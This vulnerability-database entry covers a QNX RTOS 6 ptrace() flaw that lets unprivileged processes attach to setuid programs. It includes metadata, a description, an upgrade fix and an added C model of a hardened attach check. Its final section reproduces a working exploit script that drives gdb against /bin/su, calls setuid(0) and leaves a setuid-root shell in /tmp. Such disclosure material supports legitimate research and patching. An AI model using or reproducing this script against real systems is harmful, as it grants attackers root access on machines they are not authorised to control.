Vendor: QNX RTOS
By: SecurityFocus
CVSS: 7.2 (HIGH)
Privilege Escalation
CWE: 264
Product Name: QNX RTOS
Affected Version From: QNX RTOS 6 prior to 6.4.0
Affected Version To: QNX RTOS 6 prior to 6.4.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

QNX ‘ptrace()’ Insecure

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

Mitigation:

Upgrade to QNX RTOS 6.4.0 or later
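
A model of the attach-time credential check whose absence the description above reports, shown next to the unrestricted behaviour. This is an added example, not QNX code and not part of the original entry; `struct cred`, `exec_changed_ids` and both function names are hypothetical, and the sample credentials are constructed.

```c
#include <stdbool.h>
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical credential record for this model; not a QNX structure. */
struct cred {
    uid_t ruid, euid, suid;   /* real, effective, saved user IDs */
    gid_t rgid, egid, sgid;   /* real, effective, saved group IDs */
    bool  exec_changed_ids;   /* set when exec() of a setuid/setgid file changed IDs */
};

/* Behaviour described in the advisory: any process may attach. */
bool attach_allowed_unrestricted(const struct cred *tracer, const struct cred *target)
{
    (void)tracer; (void)target;
    return true;
}

/* Hardened policy: an unprivileged tracer may attach only to a process
 * that holds no identity the tracer does not already have. */
bool attach_allowed_hardened(const struct cred *tracer, const struct cred *target)
{
    if (tracer->euid == 0)
        return true;    /* a privileged tracer may debug anything */
    if (target->exec_changed_ids)
        return false;   /* setuid/setgid image, even after it dropped privileges */
    if (target->ruid != tracer->ruid || target->euid != tracer->ruid ||
        target->suid != tracer->ruid)
        return false;   /* some user ID of the target differs from the tracer's */
    if (target->rgid != tracer->rgid || target->egid != tracer->rgid ||
        target->sgid != tracer->rgid)
        return false;   /* some group ID of the target differs from the tracer's */
    return true;
}

/* Constructed sample credentials: ruid, euid, suid, rgid, egid, sgid, flag. */
static const struct cred user1000   = {1000, 1000, 1000, 100, 100, 100, false};
static const struct cred own_child  = {1000, 1000, 1000, 100, 100, 100, false};
static const struct cred setuid_su  = {1000, 0,    0,    100, 100, 100, true};
static const struct cred dropped    = {1000, 1000, 1000, 100, 100, 100, true};
static const struct cred other_user = {1001, 1001, 1001, 100, 100, 100, false};
static const struct cred root_dbg   = {0,    0,    0,    0,   0,   0,   false};

int main(void)
{
    printf("unrestricted, setuid target: %d\n", attach_allowed_unrestricted(&user1000, &setuid_su));
    printf("hardened, setuid target:     %d\n", attach_allowed_hardened(&user1000, &setuid_su));
    return 0;
}
```

The `dropped` case matters because a setuid program that has returned to the caller's IDs can still hold privileged data or descriptors in memory.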

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4919/info

This issue affects QNX RTOS 6 prior to 6.4.0. 

#!/bin/sh

#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com 

echo "#!/bin/sh" > /tmp/runme
echo cp /bin/sh /tmp/sh > /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo "call setuid(0)" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
gdb /bin/su  < badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh